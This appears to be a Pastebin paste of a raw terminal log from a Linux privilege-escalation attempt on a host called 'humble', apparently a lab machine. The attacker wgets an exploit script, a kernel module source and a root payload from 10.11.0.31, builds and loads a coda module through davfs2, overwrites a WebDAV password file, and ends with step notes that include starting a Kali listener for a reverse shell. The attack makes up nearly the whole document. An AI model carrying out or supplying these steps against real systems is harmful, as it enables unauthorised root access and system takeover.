Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $ cd /tmp
- cd /tmp
- $ wget http://10.11.0.31/paul/exploit.sh | wget http://10.11.0.31/paul/rootprog | wget http://10.11.0.31/paul/coda.c | wget http://10.11.0.31/paul/Makefile
- wget http://10.11.0.31/paul/exploit.sh | wget http://10.11.0.31/paul/rootprog | wget http://10.11.0.31/paul/coda.c | wget http://10.11.0.31/paul/Makefile
- --2016-06-18 05:45:52-- http://10.11.0.31/paul/Makefile
- --2016-06-18 05:45:52-- http://10.11.0.31/paul/coda.c
- Connecting to 10.11.0.31:80... Connecting to 10.11.0.31:80... --2016-06-18 05:45:52-- http://10.11.0.31/paul/exploit.sh
- --2016-06-18 05:45:52-- http://10.11.0.31/paul/rootprog
- Connecting to 10.11.0.31:80... Connecting to 10.11.0.31:80... connected.
- HTTP request sent, awaiting response... connected.
- HTTP request sent, awaiting response... connected.
- HTTP request sent, awaiting response... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 158
- Saving to: `Makefile'
- 200 OK
- Length: 658 [text/x-csrc]
- Saving to: `coda.c'
- 200 OK
- Length: 3586 (3.5K) [text/x-sh]
- Saving to: `exploit.sh'
- 200 OK
- Length: 5132 (5.0K)
- Saving to: `rootprog'
- 100%[======================================>] 658 --.-K/s in 0s
- 2016-06-18 05:45:53 (60.6 MB/s) - `coda.c' saved [658/658]
- 100%[======================================>] 158 --.-K/s in 0s
- 2016-06-18 05:45:53 (26.3 MB/s) - `Makefile' saved [158/158]
- 100%[======================================>] 5,132 --.-K/s in 0s
- 2016-06-18 05:45:53 (456 MB/s) - `rootprog' saved [5132/5132]
- 100%[======================================>] 3,586 --.-K/s in 0s
- 2016-06-18 05:45:53 (297 MB/s) - `exploit.sh' saved [3586/3586]
- $ ls
- ls
- coda.c exploit.sh Makefile mongodb-27017.sock rootprog vmware-root
- $ chmod 777 *
- chmod 777 *
- chmod: changing permissions of `mongodb-27017.sock': Operation not permitted
- chmod: changing permissions of `vmware-root': Operation not permitted
- $ ./exploit.sh
- ./exploit.sh
- #######################################
- Specify the full path of the kernel module which you want to load
- Leave empty if you wish to compile it now
- Understand that you need kernel headers, make and gcc for successful compilation
- #######################################
- make -C /lib/modules/3.2.0-4-686-pae/build M=/tmp modules
- make[1]: Entering directory `/usr/src/linux-headers-3.2.0-4-686-pae'
- CC [M] /tmp/coda.o
- Building modules, stage 2.
- MODPOST 1 modules
- CC /tmp/coda.mod.o
- LD [M] /tmp/coda.ko
- make[1]: Leaving directory `/usr/src/linux-headers-3.2.0-4-686-pae'
- #######################################
- Copying the modules in use for the running kernel in the local directory
- #######################################
- #######################################
- Copying coda.ko module
- #######################################
- #######################################
- Setting the 'modules.dep' and running depmod
- #######################################
- #######################################
- Specify the user-mode ELF which you whish to copy in /tmp/rootprog that will be run as root. Default value is /tmp/rootprog
- WARNING !!!!!!!! YOU HAVE ONLY 1 SHOT !!!!! unmounting webdav partitions doesn't unload the coda.ko module
- #######################################
- /tmp/rootprog
- /tmp/rootprog
- cp: `/tmp/rootprog' and `/tmp/rootprog' are the same file
- #######################################
- Setting MODPROBE_OPTIONS variable
- #######################################
- #######################################
- Now, check the the /home/davtest/.davfs2/davfs.conf. Modify the default value of 'kernel_fs' to coda eg:
- # General Options
- # ---------------
- # dav_user davfs2 # system wide config file only
- # dav_group davfs2 # system wide config file only
- # ignore_home # system wide config file only
- kernel_fs coda
- # buf_size 16 # KiByte
- #######################################
- #######################################
- Then, check /etc/fstab for remote webdav servers which the user can mount, eg:
- https://www.crushftp.com/demo/ /home/foo/dav davfs noauto,user 0 0
- #######################################
- #######################################
- If the remote webdav is authenticated, ensure to have valid credentials. The run 'mount /home/foo/dav' inside this terminal'
- #######################################
- davtest@humble:/tmp$ ls
- ls
- coda.c coda.mod.o lib modules.order rootprog
- coda.ko coda.o Makefile Module.symvers vmware-root
- coda.mod.c exploit.sh modules.dep.ok mongodb-27017.sock
- davtest@humble:/tmp$ cd /home/davtest/.davfs2
- cd /home/davtest/.davfs2
- davtest@humble:~/.davfs2$ wget http://10.11.0.31/paul/davfs2.conf
- wget http://10.11.0.31/paul/davfs2.conf
- --2016-06-18 05:55:22-- http://10.11.0.31/paul/davfs2.conf
- Connecting to 10.11.0.31:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 2167 (2.1K)
- Saving to: `davfs2.conf.1'
- 100%[======================================>] 2,167 --.-K/s in 0s
- 2016-06-18 05:55:23 (6.74 MB/s) - `davfs2.conf.1' saved [2167/2167]
- davtest@humble:~/.davfs2$ mv davfs2.conf.1 davfs2.conf
- mv davfs2.conf.1 davfs2.conf
- davtest@humble:~/.davfs2$ cd /var/www/web1
- cd /var/www/web1
- davtest@humble:/var/www/web1$ ls -la
- ls -la
- total 16
- drwxr-xr-x 3 root root 4096 Dec 26 2013 .
- drwxr-xr-x 3 root root 4096 Dec 26 2013 ..
- -rw-r----- 1 davtest www-data 43 Dec 26 2013 passwd.dav
- drwxr-xr-x 2 www-data root 4096 Dec 26 2013 web
- davtest@humble:/var/www/web1$ htpasswd -c /var/www/web1/passwd.dav test
- htpasswd -c /var/www/web1/passwd.dav test
- New password: test
- Re-type new password: test
- Adding password for user test
- davtest@humble:/var/www/web1$ cat passwd.dav
- ls
- cat passwd.dav
- test:$apr1$wCk.6j4z$/g2zDYMVzlmRvXAW/jV1F0
- davtest@humble:/var/www/web1$ ls
- passwd.dav web
- davtest@humble:/var/www/web1$ ls
- ls
- passwd.dav web
- davtest@humble:/var/www/web1$ ls -la
- ls -la
- total 16
- drwxr-xr-x 3 root root 4096 Dec 26 2013 .
- drwxr-xr-x 3 root root 4096 Dec 26 2013 ..
- -rw-r----- 1 davtest www-data 43 Jun 18 06:01 passwd.dav
- drwxr-xr-x 2 www-data root 4096 Dec 26 2013 web
- davtest@humble:/var/www/web1$ cat passwd.dav
- cat passwd.dav
- test:$apr1$wCk.6j4z$/g2zDYMVzlmRvXAW/jV1F0
- davtest@humble:/var/www/web1$ cd /home/davtest/.davfs2
- cd /home/davtest/.davfs2
- davtest@humble:~/.davfs2$ cat davfs2.conf
- cat davfs2.conf
- # davfs2 configuration file 2009-04-12
- # version 9
- # ------------------------------------
- # Copyright (C) 2006, 2007, 2008, 2009 Werner Baumann
- # Copying and distribution of this file, with or without modification, are
- # permitted in any medium without royalty provided the copyright notice
- # and this notice are preserved.
- # Please read the davfs2.conf (5) man page for a description of the
- # configuration options and syntax rules.
- # Available options and default values
- # ====================================
- # General Options
- # ---------------
- # dav_user davfs2 # system wide config file only
- # dav_group davfs2 # system wide config file only
- # ignore_home # system wide config file only
- kernel_fs coda
- # buf_size 16 # KiByte
- # WebDAV Related Options
- # ----------------------
- # use_proxy 1 # system wide config file only
- # proxy # system wide config file only
- # servercert
- # clientcert
- # secrets ~/.davfs2/secrets # user config file only
- # ask_auth 1
- # use_locks 1
- # lock_owner <user-name>
- # lock_timeout 1800 # seconds
- # lock_refresh 60 # seconds
- # use_expect100 0
- # if_match_bug 0
- # drop_weak_etags 0
- # allow_cookie 0
- # precheck 1
- # ignore_dav_header 0
- # server_charset
- # connect_timeout 10 # seconds
- # read_timeout 30 # seconds
- # retry 30 # seconds
- # max_retry 300 # seconds
- # add_header
- # Cache Related Options
- # ---------------------
- # backup_dir lost+found
- # cache_dir /var/cache/davfs2 # system wide cache
- # ~/.davfs2/cache # per user cache
- # cache_size 50 # MiByte
- # table_size 1024
- # dir_refresh 60 # seconds
- # file_refresh 1 # second
- # delay_upload 10
- # gui_optimize 0
- # Debugging Options
- # -----------------
- # debug # possible values: config, kernel, cache, http, xml,
- # httpauth, locks, ssl, httpbody, secrets, most
- davtest@humble:~/.davfs2$ ls
- ls
- cache certs davfs2.conf secrets
- davtest@humble:~/.davfs2$ mount /home/davtest/dav
- mount /home/davtest/dav
- Please enter the username to authenticate with server
- http://127.0.0.1/webdav/ or hit enter for none.
- Username: test
- test
- Please enter the password to authenticate user test with server
- http://127.0.0.1/webdav/ or hit enter for none.
- Password: test
- libkmod: ERROR ../libkmod/libkmod.c:554 kmod_search_moddep: could not open moddep file '/tmp/lib/modules/3.2.0-4-686-pae/modules.dep.bin'
- davtest@humble:~/.davfs2$ locate modules.dep.bin
- Second Output
- /sbin/mount.davfs: no free coda device to mount
- /sbin/mount.davfs: trying fuse kernel file system
- /sbin/mount.davfs: fuse device opened successfully
- what i id
- 4) run ./exploit.sh
- 5) move passwd.dav to replace /var/www/web1/passwd.dav
- 6) move davfs2.conf to replace /home/davtest/.davfs2/davfs2.conf
- 7) don't forget to start your Kali listener to receive your shell
- 8) mount /home/davtest/dav
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement